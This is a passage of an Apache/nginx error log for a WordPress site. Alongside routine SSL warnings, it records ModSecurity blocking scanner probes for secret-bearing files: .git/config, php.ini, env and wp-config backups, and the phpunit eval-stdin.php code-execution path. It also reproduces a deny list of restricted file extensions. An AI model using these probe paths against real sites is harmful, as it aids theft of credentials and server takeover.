certificate does NOT include an ID which matches the server name [Sat Jan 28 03:21:50.650310 2023] [ssl:warn] [pid 22205:tid 140300247000960] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Jan 28 03:21:50.859361 2023] [ssl:warn] [pid 22206:tid 140300247000960] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Jan 28 21:09:49.706476 2023] [autoindex:error] [pid 22387:tid 140300032808704] [client 144.126.159.221:42086] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/tinymce/plugins/compat3x/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/js/tinymce/plugins/compat3x/css/index.php [Sun Jan 29 03:07:28.814140 2023] [ssl:warn] [pid 747:tid 140035154024320] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Jan 29 03:07:28.949571 2023] [ssl:warn] [pid 748:tid 140035154024320] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Jan 29 03:07:29.474064 2023] [ssl:warn] [pid 748:tid 140035154024320] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Jan 29 03:07:33.528803 2023] [ssl:warn] [pid 748:tid 140035154024320] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Jan 29 03:07:37.210347 2023] [ssl:warn] [pid 1301:tid 140598781159296] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Jan 29 03:07:37.321656 2023] [ssl:warn] [pid 1302:tid 140598781159296] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name 2023/01/29 06:06:07 [error] 1253#1253: *663231 access forbidden by rule, client: 35.87.173.110, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Sun Jan 29 06:39:27.950013 2023] [autoindex:error] [pid 1433:tid 140598388397824] [client 43.153.82.214:38616] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Sun Jan 29 15:20:22.967006 2023] [autoindex:error] [pid 1321:tid 140598463932160] [client 192.185.179.137:32834] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/maint/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/maint/index.php [Sun Jan 29 19:03:33.562610 2023] [ssl:warn] [pid 1302:tid 140598781159296] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Jan 30 03:06:22.698908 2023] [ssl:warn] [pid 28246:tid 140127964694400] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Jan 30 03:06:22.819310 2023] [ssl:warn] [pid 28247:tid 140127964694400] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Jan 30 03:06:23.328868 2023] [ssl:warn] [pid 28247:tid 140127964694400] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Jan 30 03:06:25.091518 2023] [ssl:warn] [pid 28247:tid 140127964694400] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Jan 30 03:06:27.386336 2023] [ssl:warn] [pid 28693:tid 140468661454720] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Jan 30 03:06:27.515149 2023] [ssl:warn] [pid 28694:tid 140468661454720] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Jan 30 21:06:52.713261 2023] [autoindex:error] [pid 28721:tid 140468331452160] [client 43.135.172.53:45796] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Tue Jan 31 03:21:19.681491 2023] [ssl:warn] [pid 16733:tid 140056474937216] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Jan 31 03:21:19.801974 2023] [ssl:warn] [pid 16734:tid 140056474937216] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Jan 31 03:21:20.169454 2023] [ssl:warn] [pid 16734:tid 140056474937216] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Jan 31 03:21:21.982650 2023] [ssl:warn] [pid 16734:tid 140056474937216] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Jan 31 03:21:24.283806 2023] [ssl:warn] [pid 17151:tid 139851971286912] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Jan 31 03:21:24.403369 2023] [ssl:warn] [pid 17152:tid 139851971286912] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Jan 31 04:52:08.017272 2023] [autoindex:error] [pid 17171:tid 139851609351936] [client 43.130.146.147:34496] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Tue Jan 31 07:28:34.868205 2023] [:error] [pid 24109:tid 139851676493568] [client 54.185.237.75:51402] [client 54.185.237.75] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".ini"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/php.ini"] [unique_id "Y9kJci7khP70dyqXEcnOCwAAAUU"] [Tue Jan 31 07:32:39.891102 2023] [:error] [pid 17171:tid 139851634530048] [client 54.185.237.75:52134] [client 54.185.237.75] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/env.backup"] [unique_id "Y9kKZyIEMX03YkauOQ0YngAAAIo"] [Tue Jan 31 07:33:04.585893 2023] [:error] [pid 24051:tid 139851542210304] [client 54.185.237.75:52204] [client 54.185.237.75] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/wp-config.backup"] [unique_id "Y9kKgKQPjKJ1HDCOgxekbAAAARU"] [Tue Jan 31 07:33:04.678533 2023] [:error] [pid 17171:tid 139851542210304] [client 54.185.237.75:52206] [client 54.185.237.75] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/wp-config.bak"] [unique_id "Y9kKgCIEMX03YkauOQ0YoQAAAJU"] [Tue Jan 31 07:33:05.504674 2023] [:error] [pid 24109:tid 139851693278976] [client 54.185.237.75:52210] [client 54.185.237.75] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".cfg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/wp-config.cfg"] [unique_id "Y9kKgS7khP70dyqXEcnOowAAAUM"] [Tue Jan 31 07:33:05.597729 2023] [:error] [pid 17171:tid 139851550603008] [client 54.185.237.75:52212] [client 54.185.237.75] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/wp-config.conf"] [unique_id "Y9kKgSIEMX03YkauOQ0YowAAAJQ"] [Tue Jan 31 07:33:09.507925 2023] [:error] [pid 24051:tid 139851676493568] [client 54.185.237.75:52226] [client 54.185.237.75] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".inc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/wp-config.inc"] [unique_id "Y9kKhaQPjKJ1HDCOgxekbgAAAQU"] [Tue Jan 31 07:33:10.329131 2023] [:error] [pid 24109:tid 139851592566528] [client 54.185.237.75:52230] [client 54.185.237.75] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/wp-config.old"] [unique_id "Y9kKhi7khP70dyqXEcnOpgAAAU8"] [Tue Jan 31 18:28:42.850905 2023] [:error] [pid 17369:tid 139851542210304] [client 5.188.62.76:41090] [client 5.188.62.76] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Y9mkKig3sjCPbKTco2mSdwAAANU"] [Wed Feb 01 03:48:27.656361 2023] [ssl:warn] [pid 18011:tid 140315069163392] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Feb 01 03:48:27.783726 2023] [ssl:warn] [pid 18012:tid 140315069163392] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Feb 01 03:48:28.366435 2023] [ssl:warn] [pid 18012:tid 140315069163392] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Feb 01 03:48:30.162259 2023] [ssl:warn] [pid 18012:tid 140315069163392] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Feb 01 03:48:32.428171 2023] [ssl:warn] [pid 18486:tid 140439402940288] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Feb 01 03:48:32.551387 2023] [ssl:warn] [pid 18487:tid 140439402940288] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Feb 01 08:43:33.531269 2023] [ssl:warn] [pid 18487:tid 140439402940288] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Feb 01 09:25:56.297418 2023] [ssl:warn] [pid 18487:tid 140439402940288] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Feb 01 09:29:09.920195 2023] [ssl:warn] [pid 18487:tid 140439402940288] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Feb 01 09:33:08.805663 2023] [ssl:warn] [pid 18487:tid 140439402940288] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Feb 01 09:42:41.321062 2023] [ssl:warn] [pid 18487:tid 140439402940288] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Feb 01 09:43:59.928730 2023] [ssl:warn] [pid 18487:tid 140439402940288] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Feb 01 09:47:37.282507 2023] [ssl:warn] [pid 18487:tid 140439402940288] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Feb 01 10:12:30.612576 2023] [ssl:warn] [pid 18487:tid 140439402940288] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Feb 01 11:07:12.421524 2023] [ssl:warn] [pid 18487:tid 140439402940288] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Feb 01 17:39:15.061205 2023] [autoindex:error] [pid 23041:tid 140438971275008] [client 144.126.159.221:55714] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/includes/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/includes/index.php [Thu Feb 02 03:15:20.239442 2023] [ssl:warn] [pid 17174:tid 139738402707328] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Feb 02 03:15:20.365864 2023] [ssl:warn] [pid 17175:tid 139738402707328] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Feb 02 03:15:20.571396 2023] [ssl:warn] [pid 17175:tid 139738402707328] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Feb 02 03:15:22.236781 2023] [ssl:warn] [pid 17175:tid 139738402707328] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Feb 02 03:15:24.613875 2023] [ssl:warn] [pid 17619:tid 140540365977472] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Feb 02 03:15:24.722070 2023] [ssl:warn] [pid 17620:tid 140540365977472] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Feb 02 06:03:56.167342 2023] [autoindex:error] [pid 17642:tid 140539944969984] [client 141.94.87.67:55990] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/images/index.php [Thu Feb 02 09:36:23.364866 2023] [:error] [pid 17642:tid 140539995326208] [client 92.205.177.86:35756] [client 92.205.177.86] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".xsd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/indeed-membership-pro/classes/PaymentGateways/mollie/vendor/phpunit/phpunit/phpunit.xsd"] [unique_id "Y9vKZ92MQywV5XlFLQKh-wAAAI4"] [Thu Feb 02 12:00:43.152393 2023] [ssl:warn] [pid 17620:tid 140540365977472] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Feb 02 15:12:38.988437 2023] [autoindex:error] [pid 19738:tid 140539995326208] [client 43.153.78.116:51902] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Thu Feb 02 23:13:01.583115 2023] [:error] [pid 19739:tid 140540168570624] [client 92.205.177.86:41244] [client 92.205.177.86] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".xsd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/indeed-membership-pro/classes/PaymentGateways/mollie/vendor/phpunit/phpunit/phpunit.xsd"] [unique_id "Y9yJzSIr3UVBSULSEb2a7wAAAII"] [Fri Feb 03 03:18:29.756149 2023] [ssl:warn] [pid 10797:tid 139740830340992] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Feb 03 03:18:29.895283 2023] [ssl:warn] [pid 10798:tid 139740830340992] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Feb 03 03:18:30.173509 2023] [ssl:warn] [pid 10798:tid 139740830340992] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Feb 03 03:18:31.571072 2023] [ssl:warn] [pid 10798:tid 139740830340992] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Feb 03 03:18:33.814307 2023] [ssl:warn] [pid 11222:tid 140223582656384] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Feb 03 03:18:33.927755 2023] [ssl:warn] [pid 11223:tid 140223582656384] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Feb 03 04:10:21.595321 2023] [:error] [pid 11243:tid 140223149168384] [client 20.249.218.158:52632] [client 20.249.218.158] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^0?$" against "REQUEST_HEADERS:Content-Length" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "280"] [id "960011"] [rev "1"] [msg "GET or HEAD Request with Body Content."] [data "25"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [tag "CAPEC-272"] [hostname "investigacionperu.com"] [uri "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "Y9zPfeZYin4IGicSF3ZoLAAAAJY"] [Fri Feb 03 19:03:32.433946 2023] [ssl:warn] [pid 11223:tid 140223582656384] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Feb 03 21:03:55.775559 2023] [autoindex:error] [pid 26877:tid 140223216310016] [client 108.167.189.51:39986] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/2018/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-content/uploads/2018/index.php [Sat Feb 04 03:48:27.862595 2023] [ssl:warn] [pid 19721:tid 140034700142464] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Feb 04 03:48:27.987631 2023] [ssl:warn] [pid 19722:tid 140034700142464] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Feb 04 03:48:28.349905 2023] [ssl:warn] [pid 19722:tid 140034700142464] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Feb 04 03:48:30.240419 2023] [ssl:warn] [pid 19722:tid 140034700142464] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Feb 04 03:48:32.479394 2023] [ssl:warn] [pid 20260:tid 140011708659584] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Feb 04 03:48:32.596765 2023] [ssl:warn] [pid 20261:tid 140011708659584] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Feb 04 18:28:12.650826 2023] [:error] [pid 20710:tid 140011353626368] [client 5.188.62.174:58918] [client 5.188.62.174] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag 